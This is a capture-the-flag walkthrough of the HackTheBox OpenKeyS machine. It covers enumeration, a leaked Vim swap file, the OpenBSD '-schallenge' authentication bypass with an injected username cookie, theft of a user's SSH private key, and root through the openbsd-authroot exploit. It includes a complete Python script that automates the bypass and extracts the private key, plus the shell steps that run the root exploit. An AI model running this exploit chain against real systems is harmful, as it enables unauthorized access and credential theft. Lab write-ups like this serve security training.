OpenKeyS HackTheBox WalkThrough


This is the OpenKeyS HackTheBox walkthrough. In this writeup I show, step by step, how I got root on the OpenKeyS machine. Before starting, a few facts about the box: OpenKeyS runs OpenBSD, is rated medium by its maker, and has the IP address 10.10.10.199.

First of all, connect to the HTB VPN and confirm connectivity by pinging 10.10.10.199. As usual I started by scanning the IP address for open ports and grabbing the banners of the services running on them. Nmap (a port scanner) gave the following result.

Scanning

$ nmap -sC -sV -oN nmap_scan 10.10.10.199

Nmap scan report of OpenKeys HackTheBox machine during WalkThrough

Ports 22 and 80 are open, running OpenSSH 8.1 and OpenBSD httpd respectively. Browsing to http://10.10.10.199 showed a login page.

Login page of OpenKeys HackTheBox machine

As usual I tried some default credentials such as admin:admin and admin:password, but the login failed. I checked the page source for hints of a CMS or for interesting comments, but found nothing useful. Next I brute-forced directories with dirsearch and got this result.

Directory brute forcing

$ dirsearch -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e all -t 20 -u http://10.10.10.199/

Directory Bruteforcing on OpenKeys HackTheBox machine during WalkThrough

The listing includes http://10.10.10.199/includes/auth.php.swp, a Vim swap file for auth.php that was left in the web root. The first block of a Vim swap file records, in separate NUL-padded fields, the login name of the user who was editing the file, the host name, and the path of the file; this is where the strings jennifer and openkeys.htb come from (they ran together as jenniferopenkeys.htb in the output, but they are a user name and a host name). I added jenniferopenkeys.htb to my /etc/hosts file in case a virtual host is served under that name; however, http://jenniferopenkeys.htb/index.php returned the same page as http://10.10.10.199/index.php. Since jennifer is a user name, I added it to my notes as a likely SSH user.

swap file of OpenKeyS Htb machine
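A Vim swap file is worth parsing rather than just viewing in the browser, because the user, host and file path sit in fixed, NUL-padded fields of its first block. The script below is an added example for this walkthrough, not code from the original post; the field offsets follow Vim's struct block0 layout, and the sample header it builds is constructed (the user and host strings are the two recovered above, while the path, timestamp, inode and pid are made up for the demo).

```python
import struct

# Offsets into Vim's block-0 swap header (struct block0 in Vim's memline.c):
#   0    b0_id[2]         "b0"
#   2    b0_version[10]   e.g. "VIM 8.1", NUL padded
#   12   b0_page_size, b0_mtime, b0_ino, b0_pid   (4 bytes each, little-endian)
#   28   b0_uname[40]     login name of the user who was editing the file
#   68   b0_hname[40]     host name
#   108  b0_fname[900]    full path of the file being edited
B0_ID, B0_VERSION, B0_INTS, B0_UNAME, B0_HNAME, B0_FNAME = 0, 2, 12, 28, 68, 108
B0_UNAME_SIZE, B0_HNAME_SIZE, B0_FNAME_SIZE = 40, 40, 900
B0_MINLEN = B0_FNAME + B0_FNAME_SIZE


def _cstr(buf: bytes) -> str:
    """Decode a NUL-terminated, NUL-padded field."""
    return buf.split(b"\x00", 1)[0].decode("utf-8", "replace")


def parse_swp_header(data: bytes) -> dict:
    """Return the identity-leaking fields of a Vim swap file's block 0."""
    if len(data) < B0_MINLEN or data[B0_ID:B0_ID + 2] != b"b0":
        raise ValueError("not a Vim swap file: missing 'b0' block-0 magic")
    page_size, mtime, ino, pid = struct.unpack("<4I", data[B0_INTS:B0_INTS + 16])
    return {
        "version": _cstr(data[B0_VERSION:B0_VERSION + 10]),
        "page_size": page_size,
        "mtime": mtime,
        "inode": ino,
        "pid": pid,
        "user": _cstr(data[B0_UNAME:B0_UNAME + B0_UNAME_SIZE]),
        "host": _cstr(data[B0_HNAME:B0_HNAME + B0_HNAME_SIZE]),
        "file": _cstr(data[B0_FNAME:B0_FNAME + B0_FNAME_SIZE]),
    }


def printable_strings(data: bytes, minlen: int = 4):
    """Fallback equivalent of strings(1): yield runs of printable ASCII.
    Because the header fields are NUL separated, user and host come out as
    two separate strings, not one run-together name."""
    run = bytearray()
    for b in data:
        if 0x20 <= b < 0x7F:
            run.append(b)
        else:
            if len(run) >= minlen:
                yield run.decode("ascii")
            run = bytearray()
    if len(run) >= minlen:
        yield run.decode("ascii")


def _field(value: str, size: int) -> bytes:
    return value.encode().ljust(size, b"\x00")


def build_sample_swp() -> bytes:
    """CONSTRUCTED sample header mimicking the auth.php.swp found on the box.
    jennifer / openkeys.htb are the strings from the post; everything else
    (path, page size, mtime, inode, pid) is made up for the demo."""
    hdr = b"b0" + _field("VIM 8.1", 10)
    hdr += struct.pack("<4I", 4096, 1590000000, 12345, 6789)
    hdr += _field("jennifer", B0_UNAME_SIZE)
    hdr += _field("openkeys.htb", B0_HNAME_SIZE)
    hdr += _field("/var/www/htdocs/includes/auth.php", B0_FNAME_SIZE)
    return hdr + b"\x00" * 16  # magic/check bytes that follow b0_fname


if __name__ == "__main__":
    sample = build_sample_swp()
    for key, value in parse_swp_header(sample).items():
        print(f"{key:10s} {value}")
    print("strings:", list(printable_strings(sample)))
```

Against the real download, call parse_swp_header(open("auth.php.swp", "rb").read()); the strings fallback is what you fall back to if the file was truncated by the server or the header does not start with the expected magic.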

After further enumeration I got this link. It describes an OpenBSD authentication bypass (CVE-2019-19521): a username of -schallenge is passed on to the system's password authenticator, which parses it as an option and reports success, so the login screen can be bypassed with the username -schallenge and any password (I used passwd).

Authentication Bypass

OpenSSH key not found message

This bypassed the login screen and redirected me to sshkey.php. According to the message on sshkey.php, no OpenSSH key was found for user -schallenge, which makes sense because that user does not exist. So I captured the login request to http://jenniferopenkeys.htb/index.php in Burp Suite to modify it.

Capture requests of login.php page in burpsuite

I added a second cookie, username=jennifer, by terminating the PHPSESSID value with a semicolon, so the header became Cookie: PHPSESSID=<session>; username=jennifer.

Adding custom cookie after capturing the request in burp suite

After adding the cookie I sent the request and was again redirected to sshkey.php.

Follow redirection

Following the redirect, the response contained the OpenSSH private key of user jennifer.

Private keys of Jennifer captured in burpSuite

Requesting the page in the browser with the same cookie showed the SSH key as well.

Private SSH Key of user Jennifer in OpenKeys Htb Machine
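The whole chain (obtain a session cookie, log in as -schallenge, inject the username cookie, follow the redirect to sshkey.php, pull the key out of the HTML) can be scripted so it is repeatable without Burp. The script below is an added example, not the box's code or the author's; it assumes the login form posts username and password fields to /index.php, that /index.php issues the PHPSESSID cookie on first visit, and that sshkey.php is the redirect target, which is what the post's screenshots show. The cookie and key-extraction helpers work on any captured response body, so they can also be used by hand on a Burp export.

```python
import html
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Optional

BASE_URL = "http://10.10.10.199"   # box address from the walkthrough
BYPASS_USER = "-schallenge"        # CVE-2019-19521: parsed as an option, login succeeds
TARGET_USER = "jennifer"           # user name recovered from auth.php.swp

KEY_RE = re.compile(
    r"-----BEGIN OPENSSH PRIVATE KEY-----.*?-----END OPENSSH PRIVATE KEY-----",
    re.S,
)


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 3xx responses; we want to read Location ourselves."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


OPENER = urllib.request.build_opener(NoRedirect)


def merge_cookie(cookie_header: str, name: str, value: str) -> str:
    """Add or overwrite one cookie in a Cookie header string. This is the
    Burp edit from the post: 'PHPSESSID=x' -> 'PHPSESSID=x; username=jennifer'."""
    pairs = [p.strip() for p in cookie_header.split(";") if p.strip()]
    pairs = [p for p in pairs if p.split("=", 1)[0] != name]
    pairs.append(f"{name}={value}")
    return "; ".join(pairs)


def session_cookie(headers) -> str:
    """Return 'PHPSESSID=<id>' from a response's Set-Cookie headers."""
    for sc in headers.get_all("Set-Cookie") or []:
        first = sc.split(";", 1)[0].strip()
        if first.startswith("PHPSESSID="):
            return first
    raise RuntimeError("server did not issue a PHPSESSID cookie")


def request(url: str, cookie: str = "", data: Optional[bytes] = None):
    """One HTTP request. A redirect comes back as the HTTPError object so the
    caller can read its .headers (urllib raises on 3xx when not followed)."""
    req = urllib.request.Request(url, data=data)
    if cookie:
        req.add_header("Cookie", cookie)
    try:
        return OPENER.open(req, timeout=10)
    except urllib.error.HTTPError as err:
        if err.code in (301, 302, 303, 307, 308):
            return err
        raise


def extract_private_key(body: str) -> Optional[str]:
    """Pull the PEM block out of the sshkey.php HTML, undoing <br> line
    breaks and HTML entities the page may have wrapped around it."""
    text = html.unescape(re.sub(r"<br\s*/?>", "\n", body, flags=re.I))
    match = KEY_RE.search(text)
    return match.group(0).strip() if match else None


def steal_key(base_url: str = BASE_URL, user: str = TARGET_USER) -> str:
    # 1. get a session cookie the way a browser would
    cookie = session_cookie(request(base_url + "/index.php").headers)
    # 2. the Burp edit: add the victim's name as a second cookie
    cookie = merge_cookie(cookie, "username", user)
    # 3. log in as -schallenge; the password value is irrelevant to the bug
    form = urllib.parse.urlencode(
        {"username": BYPASS_USER, "password": "passwd"}).encode()
    resp = request(base_url + "/index.php", cookie, form)
    location = resp.headers.get("Location", "/sshkey.php")
    # 4. follow the redirect by hand, still carrying both cookies
    page = request(urllib.parse.urljoin(base_url + "/", location), cookie)
    key = extract_private_key(page.read().decode("utf-8", "replace"))
    if key is None:
        raise RuntimeError("sshkey.php did not return a private key")
    return key


if __name__ == "__main__":
    print(steal_key())
```

Redirects are handled by hand on purpose: letting urllib follow the 302 would drop the injected Cookie header on the second request, which is exactly the step that makes the key appear.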

1. Copied the private key into a file named private_key in my /root/.ssh/ directory.

2. Changed the permissions of private_key to 600, since ssh refuses to use a key that is readable by others.

3. Connected to the remote OpenKeyS machine using private_key.

$ cd /root/.ssh/

$ nano private_key

$ chmod 600 private_key

Getting User Shell

$ ssh -i private_key jennifer@10.10.10.199

Getting User shell through SSH in OpenKeyS HackTheBox WalkThrough

Capture User Flag

$ cat user.txt

OpenKeys HackTheBox Machine user flag found during walkthrough

Privilege Escalation

Finding PrivEsc Vector

The command uname -a reveals that OpenKeyS is running OpenBSD 6.6. So I searched for an OpenBSD 6.6 privilege escalation exploit and got this article. It describes the authentication bugs in OpenBSD that Qualys disclosed in December 2019 (CVE-2019-19519 through CVE-2019-19522), which affect an unpatched 6.6 release and include a local privilege escalation to root.

So here the privilege escalation vector is the unpatched userland authentication stack, not a kernel bug: the exploit first abuses the setgid xlock binary (CVE-2019-19520) to gain membership of the auth group, then abuses S/Key authentication (CVE-2019-19522) to become root. I used this exploit to escalate to root. On a box where the 6.6 errata have been applied (syspatch -l lists the installed patches) the script fails, so that is the first thing to check.

Getting Root Shell

I followed exactly the steps given in the link above and got root.

Note: if the exploit errors out, try running it from the home directory of user jennifer.

$ cd /tmp

$ nano openbsd-authroot   # copy & paste the content from just above link to this file

$ chmod +x openbsd-authroot

$ ./openbsd-authroot

Privilege Escalation during OpenKeys HackTheBox WalkThrough

Capture Root Flag

$ cat root.txt

OpenKeys HackTheBox Machine root flag found during walkthrough

This is how I got root on OpenKeyS HackTheBox. I learnt a lot from this box. Thanks for reading; if you run into any issue, write it in the comment section. For any suggestion about the writeup, feel free to write to us at [email protected].


Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec Consultant by day and a Bug Bounty Hunter & CTF player by night. Sometimes I write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/